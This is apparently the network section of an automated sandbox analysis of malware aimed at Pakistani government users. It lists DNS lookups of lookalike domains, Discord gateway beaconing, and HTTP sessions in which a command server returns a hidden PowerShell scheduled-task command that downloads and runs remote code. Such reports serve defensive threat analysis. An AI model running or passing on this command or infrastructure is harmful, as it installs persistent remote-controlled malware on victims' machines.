                                                                                                                                                                    Sep 30, 2024 18:58:19.736762047 CEST53602321.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:22.879631996 CEST6023353192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:22.886416912 CEST53602331.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:22.890319109 CEST6023453192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:22.898044109 CEST53602341.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:22.900959969 CEST6023553192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:22.908229113 CEST53602351.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:22.968064070 CEST6023653192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:22.977456093 CEST53602361.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:22.979855061 CEST6023753192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:22.990200043 CEST53602371.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:22.993117094 CEST6023853192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:23.003952026 CEST53602381.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:25.382898092 CEST5553653192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:25.820085049 CEST53555361.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.202284098 CEST6310253192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:26.203921080 CEST6104653192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:26.210859060 CEST53581671.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.221546888 CEST53498051.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.378424883 CEST53610461.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.391805887 CEST53631021.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.352183104 CEST53601541.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:30.534493923 CEST5709053192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:30.534674883 CEST5456453192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:30.541722059 CEST53570901.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:30.542982101 CEST53545641.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.119193077 CEST6290453192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:31.301826954 CEST53629041.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:35.778315067 CEST4928253192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:35.954905033 CEST53492821.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:40.878232002 CEST5756453192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:40.887160063 CEST53575641.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:44.458796978 CEST53561901.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:59.548046112 CEST6100653192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:58:59.555881023 CEST53610061.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:03.494328976 CEST53611621.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:11.897355080 CEST138138192.168.2.7192.168.2.255
                                                                                                                                                                    Sep 30, 2024 18:59:18.643251896 CEST6035253192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:59:18.653446913 CEST53603521.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:25.782953978 CEST53515021.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:25.978931904 CEST53632921.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:39.251396894 CEST5163753192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 18:59:39.258517981 CEST53516371.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:59:54.446173906 CEST53592561.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:00:09.534959078 CEST6186753192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 19:00:09.542581081 CEST53618671.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:00:40.369018078 CEST53584411.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:00:55.441621065 CEST6480953192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 19:00:55.448606968 CEST53648091.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:01:21.220726013 CEST5450353192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 19:01:21.229494095 CEST53545031.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:01:56.416773081 CEST53637091.1.1.1192.168.2.7
                                                                                                                                                                    Sep 30, 2024 19:02:11.486885071 CEST4934953192.168.2.71.1.1.1
                                                                                                                                                                    Sep 30, 2024 19:02:11.495424986 CEST53493491.1.1.1192.168.2.7

                                                                                                                                                                    ICMP Packets

                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                    Sep 30, 2024 18:58:19.744822025 CEST192.168.2.7104.22.15.1544d5aEcho
                                                                                                                                                                    Sep 30, 2024 18:58:19.751045942 CEST104.22.15.154192.168.2.7555aEcho Reply
                                                                                                                                                                    Sep 30, 2024 18:58:20.750298023 CEST192.168.2.7104.22.15.1544d59Echo
                                                                                                                                                                    Sep 30, 2024 18:58:20.756638050 CEST104.22.15.154192.168.2.75559Echo Reply
                                                                                                                                                                    Sep 30, 2024 18:58:21.765928984 CEST192.168.2.7104.22.15.1544d58Echo
                                                                                                                                                                    Sep 30, 2024 18:58:21.772416115 CEST104.22.15.154192.168.2.75558Echo Reply
                                                                                                                                                                    Sep 30, 2024 18:58:22.781742096 CEST192.168.2.7104.22.15.1544d57Echo
                                                                                                                                                                    Sep 30, 2024 18:58:22.788064003 CEST104.22.15.154192.168.2.75557Echo Reply

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Sep 30, 2024 18:58:19.708942890 CEST192.168.2.71.1.1.10x6c9aStandard query (0)www.nadra.gov.pkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.879631996 CEST192.168.2.71.1.1.10x1Standard query (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.890319109 CEST192.168.2.71.1.1.10x2Standard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.900959969 CEST192.168.2.71.1.1.10x3Standard query (0)www.yahoo.com28IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.968064070 CEST192.168.2.71.1.1.10x1Standard query (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.979855061 CEST192.168.2.71.1.1.10x2Standard query (0)www.protonmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.993117094 CEST192.168.2.71.1.1.10x3Standard query (0)www.protonmail.com28IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:25.382898092 CEST192.168.2.71.1.1.10xa5d2Standard query (0)pmofficepakistancloudserver.shiftroof.topA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:26.202284098 CEST192.168.2.71.1.1.10xf1a3Standard query (0)pmo.gov.pkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:26.203921080 CEST192.168.2.71.1.1.10xed39Standard query (0)pmo.gov.pk65IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:30.534493923 CEST192.168.2.71.1.1.10x121dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:30.534674883 CEST192.168.2.71.1.1.10x7c9aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:31.119193077 CEST192.168.2.71.1.1.10x6f98Standard query (0)ofc.mofserviceserver.topA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:35.778315067 CEST192.168.2.71.1.1.10x68adStandard query (0)cloud.dellicon.topA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:40.878232002 CEST192.168.2.71.1.1.10xcfb9Standard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:59.548046112 CEST192.168.2.71.1.1.10x530dStandard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:18.643251896 CEST192.168.2.71.1.1.10xc4fdStandard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:39.251396894 CEST192.168.2.71.1.1.10xe207Standard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:09.534959078 CEST192.168.2.71.1.1.10x88dfStandard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:55.441621065 CEST192.168.2.71.1.1.10x7529Standard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:01:21.220726013 CEST192.168.2.71.1.1.10x3438Standard query (0)gateway.discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:02:11.486885071 CEST192.168.2.71.1.1.10x1de9Standard query (0)gateway.discord.ggA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Sep 30, 2024 18:58:19.736762047 CEST1.1.1.1192.168.2.70x6c9aNo error (0)www.nadra.gov.pk104.22.15.154A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:19.736762047 CEST1.1.1.1192.168.2.70x6c9aNo error (0)www.nadra.gov.pk104.22.14.154A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:19.736762047 CEST1.1.1.1192.168.2.70x6c9aNo error (0)www.nadra.gov.pk172.67.30.179A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.886416912 CEST1.1.1.1192.168.2.70x1No error (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.898044109 CEST1.1.1.1192.168.2.70x2No error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.898044109 CEST1.1.1.1192.168.2.70x2No error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.898044109 CEST1.1.1.1192.168.2.70x2No error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.908229113 CEST1.1.1.1192.168.2.70x3No error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.908229113 CEST1.1.1.1192.168.2.70x3No error (0)me-ycpi-cf-www.g06.yahoodns.net28IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.908229113 CEST1.1.1.1192.168.2.70x3No error (0)me-ycpi-cf-www.g06.yahoodns.net28IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.977456093 CEST1.1.1.1192.168.2.70x1No error (0)1.1.1.1.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:22.990200043 CEST1.1.1.1192.168.2.70x2No error (0)www.protonmail.com185.70.42.31A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:25.820085049 CEST1.1.1.1192.168.2.70xa5d2No error (0)pmofficepakistancloudserver.shiftroof.top172.67.132.65A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:25.820085049 CEST1.1.1.1192.168.2.70xa5d2No error (0)pmofficepakistancloudserver.shiftroof.top104.21.4.163A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:26.391805887 CEST1.1.1.1192.168.2.70xf1a3No error (0)pmo.gov.pk203.101.184.118A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:30.541722059 CEST1.1.1.1192.168.2.70x121dNo error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:30.542982101 CEST1.1.1.1192.168.2.70x7c9aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:31.301826954 CEST1.1.1.1192.168.2.70x6f98No error (0)ofc.mofserviceserver.top172.67.149.9A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:31.301826954 CEST1.1.1.1192.168.2.70x6f98No error (0)ofc.mofserviceserver.top104.21.29.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:35.954905033 CEST1.1.1.1192.168.2.70x68adNo error (0)cloud.dellicon.top188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:35.954905033 CEST1.1.1.1192.168.2.70x68adNo error (0)cloud.dellicon.top188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:40.887160063 CEST1.1.1.1192.168.2.70xcfb9No error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:40.887160063 CEST1.1.1.1192.168.2.70xcfb9No error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:40.887160063 CEST1.1.1.1192.168.2.70xcfb9No error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:40.887160063 CEST1.1.1.1192.168.2.70xcfb9No error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:40.887160063 CEST1.1.1.1192.168.2.70xcfb9No error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:59.555881023 CEST1.1.1.1192.168.2.70x530dNo error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:59.555881023 CEST1.1.1.1192.168.2.70x530dNo error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:59.555881023 CEST1.1.1.1192.168.2.70x530dNo error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:59.555881023 CEST1.1.1.1192.168.2.70x530dNo error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:58:59.555881023 CEST1.1.1.1192.168.2.70x530dNo error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:18.653446913 CEST1.1.1.1192.168.2.70xc4fdNo error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:18.653446913 CEST1.1.1.1192.168.2.70xc4fdNo error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:18.653446913 CEST1.1.1.1192.168.2.70xc4fdNo error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:18.653446913 CEST1.1.1.1192.168.2.70xc4fdNo error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:18.653446913 CEST1.1.1.1192.168.2.70xc4fdNo error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:39.258517981 CEST1.1.1.1192.168.2.70xe207No error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:39.258517981 CEST1.1.1.1192.168.2.70xe207No error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:39.258517981 CEST1.1.1.1192.168.2.70xe207No error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:39.258517981 CEST1.1.1.1192.168.2.70xe207No error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 18:59:39.258517981 CEST1.1.1.1192.168.2.70xe207No error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:09.542581081 CEST1.1.1.1192.168.2.70x88dfNo error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:09.542581081 CEST1.1.1.1192.168.2.70x88dfNo error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:09.542581081 CEST1.1.1.1192.168.2.70x88dfNo error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:09.542581081 CEST1.1.1.1192.168.2.70x88dfNo error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:09.542581081 CEST1.1.1.1192.168.2.70x88dfNo error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:55.448606968 CEST1.1.1.1192.168.2.70x7529No error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:55.448606968 CEST1.1.1.1192.168.2.70x7529No error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:55.448606968 CEST1.1.1.1192.168.2.70x7529No error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:55.448606968 CEST1.1.1.1192.168.2.70x7529No error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:00:55.448606968 CEST1.1.1.1192.168.2.70x7529No error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:01:21.229494095 CEST1.1.1.1192.168.2.70x3438No error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:01:21.229494095 CEST1.1.1.1192.168.2.70x3438No error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:01:21.229494095 CEST1.1.1.1192.168.2.70x3438No error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:01:21.229494095 CEST1.1.1.1192.168.2.70x3438No error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:01:21.229494095 CEST1.1.1.1192.168.2.70x3438No error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:02:11.495424986 CEST1.1.1.1192.168.2.70x1de9No error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:02:11.495424986 CEST1.1.1.1192.168.2.70x1de9No error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:02:11.495424986 CEST1.1.1.1192.168.2.70x1de9No error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:02:11.495424986 CEST1.1.1.1192.168.2.70x1de9No error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 30, 2024 19:02:11.495424986 CEST1.1.1.1192.168.2.70x1de9No error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • pmo.gov.pk
                                                                                                                                                                    • ofc.mofserviceserver.top
                                                                                                                                                                    • slscr.update.microsoft.com
                                                                                                                                                                    • cloud.dellicon.top
                                                                                                                                                                    • gateway.discord.gg
                                                                                                                                                                    • pmofficepakistancloudserver.shiftroof.top

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.749702172.67.132.65805140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 30, 2024 18:58:26.199614048 CEST197OUTGET //WinSysMgr/ HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                    Host: pmofficepakistancloudserver.shiftroof.top
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Sep 30, 2024 18:58:26.976491928 CEST1044INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:58:26 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%2010%3A28%20PM; expires=Tue, 30-Sep-2025 16:58:26 GMT; Max-Age=31536000
                                                                                                                                                                    Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:26 GMT; Max-Age=1209600
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLnT5puU%2Ff2%2Fu824QOu6ijf3AgERZxSj3YCWlUZzd0KMC5LbVWsyaKBhR5bOKHVGDLli3Rz%2FrGwZVxy267ZqhNInz2HwNJDUcYme%2FYaJWwiD5Ax45XMKHxNcxZrFInLQjbc2kxDBKrqbsVag0rwpryToXi0hqCN086dPNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8cb5c1fbff6d42b3-EWR
                                                                                                                                                                    Data Raw: 39 63 0d 0a 63 6d 64 20 2f 6b 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 64 61 69 6c 79 20 2f 74 6e 20 4c 6f 63 61 6c 4d 43 6c 65 61 6e 65 72 20 2f 74 72 20 22 50 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 69 72 6d 20 68 74 74 70 3a 2f 2f 6f 66 63 2e 6d 6f 66 73 65 72 76 69 63 65 73 65 72 76 65 72 2e 74 6f 70 2f 44 53 43 54 53 43 2f 7c 50 6f 77 65 72 73 68 65 6c 6c 22 20 2f 73 74 20 31 30 3a 31 33 20 2f 66 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 9ccmd /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /f0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.749714172.67.149.9807884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 30, 2024 18:58:31.315795898 CEST176OUTGET /DSCTSC/ HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                    Host: ofc.mofserviceserver.top
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Sep 30, 2024 18:58:31.779834986 CEST861INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:58:31 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                    Expires: Mon, 30 Sep 2024 17:58:31 GMT
                                                                                                                                                                    Location: https://ofc.mofserviceserver.top/DSCTSC/
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1wDC77Ox%2FTg%2F9o9FMCOKhxOVNewnvJJ2bOs4w932sfwC7qQaYvltI7nbv4yD2N0NNCgKnwX%2FfJetZqgNkcAOwkdfVta%2BBIN8Pf2tyEAfLx9OZImSxL4ZHjqmRfFdpNonPHu21h0VmLhaWY8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8cb5c21c3d2d7c90-EWR
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.749719188.114.97.3808136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 30, 2024 18:58:35.969408035 CEST172OUTGET /1000/500/ HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                    Host: cloud.dellicon.top
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Sep 30, 2024 18:58:36.444175005 CEST847INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:58:36 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                    Expires: Mon, 30 Sep 2024 17:58:36 GMT
                                                                                                                                                                    Location: https://cloud.dellicon.top/1000/500/
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4GNjW0ec3ZtW9c5d9r6oTu3UrdvvY0gld0moODKczY8TtbIdYUfOIpcBz88l8MAj3pJqxx6A2f683uTyawp1M%2Ba3islAc6Rgs9Vfwf%2FkiWzY7slz%2BGmq4XiAK9CD4TQ6AgjB6g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8cb5c2395a808c30-EWR
